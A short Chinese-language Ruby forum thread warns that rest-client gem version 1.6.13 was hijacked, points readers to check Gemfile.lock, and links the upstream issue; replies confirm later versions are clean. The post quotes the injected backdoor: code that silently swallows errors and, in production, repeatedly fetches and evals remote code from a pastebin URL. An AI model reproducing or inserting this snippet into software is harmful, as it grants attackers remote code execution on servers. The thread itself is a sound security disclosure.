Ruby [警告] rest-client 1.6.13 被黑 请检查 Gemfile.lock 中的 rest-client 版本

jicheng1014 · August 20, 2019 · Last by jicheng1014 replied at August 21, 2019 · 5514 hits

有问题的代码在这里

def _!
  begin
    yield
  rescue Exception
  end
end

_!{Thread.new{loop{_!{sleep 900;eval(open('https://pastebin.com/raw/5iNdELNX').read)}}}if Rails.env[0]=="p"}

详情参见 :

https://github.com/rest-client/rest-client/issues/713

靠,跟之前一样的手法。

更高的版本是不是就没有问题?

Reply to raofeng

没有问题

You need to Sign in before reply, if you don't have an account, please Sign up first.